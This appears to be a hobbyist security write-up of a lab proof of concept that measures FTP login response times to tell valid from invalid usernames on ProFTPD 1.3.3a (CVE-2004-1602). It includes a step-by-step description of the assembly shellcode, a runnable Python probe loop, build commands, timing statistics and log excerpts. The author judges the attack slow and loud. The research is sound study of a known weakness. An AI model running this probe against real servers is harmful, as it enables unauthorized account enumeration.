- FTP (ProFTPD) TIMING ATTACK LINUX X86_64 ASSEMBLY
- This all started off with a discussion on whether it was feasible to exploit an XSS/CSRF combo to force the download of a page that could perform an HTTP timing attack. it was a long and heated discussion, but my main points were that 1) if i could make you download something, it would probably be a bit more useful than an HTTP timing attack, and 2) that javascript was too imprecise for such an attack, with only about 15 ms precision, which for most timing attacks would be way too coarse.
- Nevertheless, this did make me think about timing attacks in general. and as i am working through linux x86_64 system calls in assembly anyway, why not do something useful and try a PoC with potentially usable shellcode to see how feasible such an attack would be?
- -------------------------------
- so, let's define a PoC:
- i'll ignore finding an injectable vulnerability to exploit for the shellcode. if i build the shellcode directly in assembly, i can keep the binary small and figure out what sort of size we're talking about for injection. the smaller it is, the more places it can go. moreover, we have access to the real-time clock, which is nanosecond-based, as precise as we can go. i'll use x86_64 linux, which is probably not too realistic for a client-side/browser injection, but it's what i have and what i am playing with. it'll do. the same process should be equivalent on other platforms.
- then, we need a target that is known to have a timing attack vulnerability and doesn't make coding the assembly or the set-up too much of a hassle. from configuring a debian 32-bit VM recently, i remembered seeing a config option for delay, which is perfect for this PoC, so that's what i settled on.
- ProFTPD 1.3.3a - up to date debian 32-bit
- CVE-2004-1602: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1602
- basically, the vulnerability is this: if a valid user tries to log in, the FTPD switches to the user's home directory before the password is requested. if the user is invalid, it doesn't do that, but still asks for the password, just as it would for a valid user. this creates a very slight timing difference that can be measured and compared.
- this issue was discovered years ago and the fix was mod_delay. this adds a bit of extra time based on past time differences, in order to mask the timing difference. in ProFTPD 1.3.3a this is turned on by default but can be turned off in the config file. perfect for our use, as we can test with mod_delay both on and off, and a cleartext protocol should not be too hard to code against.
- ---------------------------------
- FILES:
- * ftp_timing.asm: http://pastebin.com/G7sj5aj6
- * parse-timing-file.py: http://pastebin.com/X1Zamzq3
- ---------------------------------
- ftp_timing.asm contains the assembly code for nasm (intel format). to skilled assembly coders it is probably crappy, but it works. this version has been (largely but not completely) de-nulled; the original code is kept in a comment before it. the de-nulling is primarily through classic register name tricks and was mostly done to reduce the size of the shellcode. code labels and occasional comments hopefully help navigate it.
- it starts with a bunch of assigns for easy reference, and two string variables as set-up ("USER makhno" and "USER 0xACAB"), the first a valid login, the second invalid. then a place to put the server response and a place to store its length.
- The code does the following:
- 1. set privileges as high as we can, just because
- 2. open a socket
- 3. flip r8 to determine whether to send a valid or invalid login. This will flip each loop
- 4. store socketfd. will be at rbp-0x8 throughout for reference
- 5. connect to 192.168.1.8:21 - set r9 to 0 for 'first read' (see below)
- 6. read the response so we get the banner
- 7. write out the response. I am printing to STDOUT
- 8. sleep 1 second
- Now, we get the critical part of what needs to be measured:
- 9. get the start time
- a. set up some memory on the stack to store sec/nanosec structure
- b. get the real-time clock
- c. set pointer to space on the stack
- d. syscall
- 10. jump to tcpsend:
- a. flip r9 to 1 to show that this is us sending the USER command. this will be used to control code flow when we read the response
- b. check whether to send "USER makhno" or "USER 0xACAB" and set rsi with result
- c. syscall and jump to tcpread
- 11. read response
- a. set memory location and length
- b. check r9 to see whether we are in the response to USER command
- c. jump to get end time
- 12. get the end time (see 9, but at -0x10 offset)
- So, at this point effectively our clock is stopped.
- 13. the secs/nanosecs time structure is in two separate addresses. subtract start secs and start nanosecs from end secs and end nanosecs
- 14. i am interested in nanoseconds: multiply seconds by 1e09 and add to nanosecs so we have one end result
- 15. convert from hex to decimal and make it a printable number by adding 0x30 to each byte
- 16. write out the nanosecond result and add a linefeed
- 17. we jumped over the write out of the FTP response to not affect the timing result. print it now
- 18. close the connection
- 19. sleep 1 second
- 20. loop up to open a new socket until ^C
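- the loop above, sketched as a rough python equivalent (this is NOT the shellcode, just an illustration of the same steps; the host, port and the two USER strings are the ones used in this writeup):

```python
# rough python equivalent of the probe loop above - a sketch, not the
# actual shellcode. host, port and the USER strings are from this writeup.
import socket
import time

HOST, PORT = "192.168.1.8", 21
USERS = [b"USER makhno\r\n", b"USER 0xACAB\r\n"]   # valid / invalid

def elapsed_ns(start_s, start_ns, end_s, end_ns):
    # steps 13-14: subtract the sec/nanosec pairs separately, then
    # fold into a single nanosecond value (secs * 1e9 + nanosecs)
    return (end_s - start_s) * 1_000_000_000 + (end_ns - start_ns)

def probe(user_cmd):
    # steps 2-18 for a single iteration
    with socket.create_connection((HOST, PORT)) as s:
        print(s.recv(512).decode(errors="replace"), end="")  # steps 6-7: banner
        time.sleep(1)                                        # step 8
        t0 = time.clock_gettime_ns(time.CLOCK_REALTIME)      # step 9
        s.sendall(user_cmd)                                  # step 10
        resp = s.recv(512)                                   # step 11
        t1 = time.clock_gettime_ns(time.CLOCK_REALTIME)      # step 12
        print(elapsed_ns(*divmod(t0, 1_000_000_000),         # steps 13-16
                         *divmod(t1, 1_000_000_000)))
        print(resp.decode(errors="replace"), end="")         # step 17
    # socket closed on 'with' exit (step 18)
```

- to mirror steps 19-20, call probe() in a loop that alternates the two USER strings with a 1 second sleep in between, until ^C.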
- -----------------------------------
- commands:
- nasm -f elf64 -o ftp_timing.o ftp_timing.asm
- ld -o ftp_timing ftp_timing.o
- you can inspect the opcodes with objdump:
- objdump -D ftp_timing
- ------------------------------------
- when coding this, i had an 'int 3' at the top in order to halt properly in gdb. even then, just running 'gdb ftp_timing' and 'run' would execute without halting. if you want to step through the code, uncomment the int 3 near the top of the code and use this:
- gdb
- >target exec ftp_timing
- >run
- it should halt on the int 3
- ------------------------------------
- ~*~*~*~*~*~*~*~*~*~*~
- TIME TO TEST THIS OUT
- ~*~*~*~*~*~*~*~*~*~*~
- i will run this from my host x86_64 linux box. it hosts a debian 32-bit vm with ProFTPD 1.3.3a running. the machine has 5-6 regular users with home directories. the users are jailed to their home directories in the proftpd config file, and no anonymous (or root) access is allowed. the delay option is set to off.
- i'm directing STDOUT to a file so we can use it later for analysis. the debian virtual machine runs a couple of services, but no other requests were being made besides these FTP requests. the x86_64 host is accessed through SSH and also runs a few daemons, but nothing under any kind of load. network impact should be negligible.
- ------------------------------------
- NOTE: as i should have realized before my initial tests, measuring often means influencing results, especially when you go down to the nanosecond level. during coding/debugging i had been using tcpdump, and ran it during initial tests as well. i then found out that running tcpdump added about 30-50% to the response times!!! i was also using tail -f to check the file being written, but didn't do that during the actual test either, so as not to influence the results.
- to be fair, the writing itself shouldn't have any real influence, as it is done outside of the time measurement and before a 1 sec sleep.
- -------------------------------------
- fire it up:
- ./ftp_timing > <output file>
- you should get something like this in your output file (or stdout if not re-directing to file):
- 220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.8]
- 818773
- 331 Password required for 0xACAB
- 220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.8]
- 891999
- 331 Password required for makhno
- 220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.8]
- 732719
- 331 Password required for 0xACAB
- to take good data for analysis, you need 1,000s of data points. since we wait 2 sec total for each loop, this takes a while. my test runs ran for about 3.5 hrs or so.
- this is fast. 732719 nanosecs is just over 0.7 milliseconds. the longer result here is just under 0.9 milliseconds. it was good to go with nanosecond measurement, or the lack of precision would have made analysis really difficult.
- when i ran this with mod_delay turned on, it looked like this:
- 220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.8]
- 1465633
- 331 Password required for 0xACAB
- 220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.8]
- 1520684
- 331 Password required for makhno
- 220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.8]
- 1851724
- 331 Password required for 0xACAB
- 220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.8]
- 1245182
- 331 Password required for makhno
- as should be expected - after all, mod_delay adds a bit of time - these times are longer, but even then they only range from 1.2 ms to 1.8 ms. not something you'd ever notice as a user.
- to help with analysis, i wrote a little python script that parses the output file into a csv file with each USER attempt on one line, prefixed with a line number (see FILES ^ ). this way it is easy to import into excel.
- here is my command for when mod_delay was turned on:
- ./parse-timing-file.py -i proftpd-timing-on.txt -o proftpd-timing-on.csv
- the result will look like this:
- 4,220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.8],1851724,331 Password required for 0xACAB
- 5,220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.168.1.8],1245182,331 Password required for makhno
- check the last line, which may not have the nanosecs and response, depending on when you killed ftp_timing with ^C
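- the grouping logic can be sketched like this (a reconstruction guessed from the sample output above, not the actual pastebin script):

```python
# a guess at what parse-timing-file.py does, reconstructed from the
# sample output in this writeup - the real script is at the pastebin link.
def parse_timing(lines):
    rows = []
    # group output into (banner, nanosecs, response) triples; an
    # incomplete final triple (from killing ftp_timing with ^C) is dropped
    for n, i in enumerate(range(0, len(lines) - 2, 3), start=1):
        banner, nanosecs, response = lines[i:i + 3]
        rows.append(f"{n},{banner},{nanosecs},{response}")
    return rows
```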
- -------------------------------------
- RESULTS AND ANALYSIS
- my tests ran for about 3.5 hrs. for the test with mod_delay off i got just over 8,000 data points, and 6,600 with it on. in each result set there were always 6-10 complete outliers where something went wrong or timed out, which i simply removed. from the rest, here are some basic statistics, assuming a normal distribution:
- mod_delay: off |INVALID| | VALID |
- ---------------------------------------
- -2*std dev: 642806 632770
- -1*std dev: 706643 704462
- mean: 770480 776154
- +1*std dev: 834317 847847
- +2*std dev: 898154 919539
- std dev: 63837 71692
- difference: 0 5674
- there is a difference, but it is very, very small. the difference between the means is just 5-6 microseconds. the std dev is a little larger for the VALID login as well, mostly at the longer end, which suggests the timing difference exists.
- i played with different chart options to see how easy it was to detect a timing difference, and it is there, but not really obvious (and certainly not in text format). also, it is not really a "normal" distribution, more a quick 'peak' followed by a long slope. considering a response cannot come sooner than an absolute minimum, i decided to start bucketing the data points and count the number of occurrences below certain thresholds. to make it meaningful i used buckets of 12,500 nanosecs. finally, subtract the previous bucket's count so each bucket's own number can be shown side-by-side:
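- the basic statistics above can be reproduced with the stdlib statistics module (a sketch; function name is mine):

```python
# sketch of the stats in the tables above: mean, sample standard
# deviation, and the +/- 1 and 2 std dev bounds
import statistics

def timing_stats(samples):
    mean = statistics.mean(samples)
    sd = statistics.stdev(samples)   # sample std dev (n - 1)
    return {"mean": mean, "std dev": sd,
            "-2*std dev": mean - 2 * sd, "-1*std dev": mean - sd,
            "+1*std dev": mean + sd, "+2*std dev": mean + 2 * sd}
```

- the "difference" row in the tables is then just the gap between the two means.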
- | INVALID | | VALID |
- -----------------------------------
- <625,000 | 3 2
- <637,500 | 9 5
- <650,000 | 24 14
- <662,500 | 47 29
- <675,000 | 43 47
- <687,500 | 39 45
- <700,000 | 84 60
- <712,500 | 129 117
- <725,000 | 229 211
- <737,500 | 480 333
- <750,000 | 686 689
- <762,500 | 727 778
- <775,000 | 378 476
- <787,500 | 171 177
- <800,000 | 84 87
- …
- this should be enough to make the point. there is a small set that comes in real quick, with initially higher numbers in the INVALID column and the VALID requests catching up. then, as the larger bulk comes in, INVALID takes a lead, with the VALID responses catching up at 750,000 while the INVALIDs are already tailing off. visually, it is as if the VALID user requests "follow" the INVALID ones.
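- the bucketing itself can be sketched like this (counts below each threshold, then differenced so each bucket holds only its own occurrences; function name and parameters are mine):

```python
# sketch of the bucketing above: cumulative counts below each
# threshold, then subtract the previous threshold's count so each
# bucket shows only its own occurrences
def bucket_counts(samples, start, width, n_buckets):
    thresholds = [start + k * width for k in range(1, n_buckets + 1)]
    cumulative = [sum(1 for s in samples if s < t) for t in thresholds]
    return [c - p for c, p in zip(cumulative, [0] + cumulative[:-1])]
```

- for the table above this would be called with start=612500, width=12500, run once over the INVALID samples and once over the VALID ones.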
- so far so good. it looks like the difference is small, but detectable.
- let's look at the counter-test: what happens when mod_delay is turned on:
- mod_delay: on |INVALID| | VALID |
- ---------------------------------------
- -2*std dev: 880056 887491
- -1*std dev: 1339527 1342002
- mean: 1798998 1796513
- +1*std dev: 2258469 2251025
- +2*std dev: 2717939 2705536
- std dev: 459471 454511
- difference: 2484 0
- the response times are noticeably longer for both VALID and INVALID users. these stats are again misleading because of the "sloping" in the longer responses, and there are no responses faster than 1,000,000 nanoseconds, whereas with mod_delay off virtually all responses come in below that. what is more, the stretch of the data set is far longer. with mod_delay off, even the outlier responses stay below 850-875,000 nanosecs, less than 100,000 from the mean; with mod_delay on, the tail only ends around 2,400,000, about 600,000 from the mean.
- because of this stretch, bucketing was done with 50,000 nanosec intervals, which gives a hint that a slightly faster response for INVALID users can still be detected, but to be conclusive this would require a lot more data points and tighter bucket intervals. interestingly, the smaller bump after the main hump returns here, but more pronounced and stretched. what was a 2nd peak of about 20% of the main peak's height with mod_delay off is close to 50% (and goes on for longer) with mod_delay on. in both peaks, there is still a slight suggestion that INVALID user responses lead by a small amount. i will probably run a longer analysis some time in the future.
- -----------------------------------------
- CONCLUSIONS
- i am not really any more convinced that this is a likely attack vector. before an initial de-nulling pass, the opcodes came to around 1030 bytes; after simple de-nulling, around 630. that's not large, but it is not exactly small either, compared to a reverse shell, for instance. the code also doesn't include any 'report-back' yet. i can open another socket and feed its fd to write instead of STDOUT if we want the results in real time, but any more stealthy and delayed option would require a lot more opcodes (and work)
- even if we found a place large enough to inject and run it, it is not exactly quiet. we still need a good number of data points, because even with mod_delay off the difference in means is substantially smaller than the standard deviation, and even if we only look at the fastest responses we easily need 1-2,000 data points. with the current 1 sec sleeps, you get about 2,000 attempts per hour.
- here i only use two user accounts, one known to be good, one known to be bad. if we want to use this for user enumeration, we may need to run through 100s of possible user names, far more if we can't make educated guesses. we know we can run through about 25-50 possible user accounts _in_a_day; 100s could take weeks. and at the end, we won't have their logins, just confirmation that they are valid user accounts on that machine.
- this also assumes that 1,000-2,000 data points is enough. on a busy network, responses will quickly get unreliable. if the server is busy, that will affect these millisecond response times. the more data points we need, the longer the timing attack takes.
- and it's LOUD. i left proftpd logging levels at their defaults, and my testing generated about 7.5MB worth of logs, 1.3MB alone since turning mod_delay on. running for days would grow them to GBs. moreover, the connection times and the ip address of the host running the attack are logged:
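- the back-of-the-envelope arithmetic behind the "25-50 accounts in a day" estimate (function name is mine; numbers are from this writeup):

```python
# duration arithmetic from the numbers in this writeup: ~2 seconds per
# probe (two 1 sec sleeps), 1,000-2,000 data points per username
def enumeration_days(usernames, points_per_user, secs_per_probe=2):
    return usernames * points_per_user * secs_per_probe / 86_400

# e.g. ~43 candidate accounts at 1,000 points each take about a day;
# at 2,000 points each, that drops to roughly half as many accounts
```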
- Feb 10 17:03:46 debby proftpd[32445] debby (::ffff:192.168.1.7[::ffff:192.168.1.7]): FTP session opened.
- Feb 10 17:03:47 debby proftpd[32445] debby (::ffff:192.168.1.7[::ffff:192.168.1.7]): FTP session closed.
- (192.168.1.7 is the host)
- of course, to speed up the logon attempts, you can sleep for less time, but that will only make the attack louder and fill the logs even faster. not my idea of stealthy. we can't even clean up the logs when the attack is successful!
- so, while this was a fun exercise under practically ideal conditions, and it leaves me with a tool to test the same timing attack against other FTP servers (it uses the standard FTP protocol and is not unique to ProFTPD) as well as whether mod_delay can be defeated, i doubt that this kind of timing attack is particularly useful or likely to be encountered in the wild.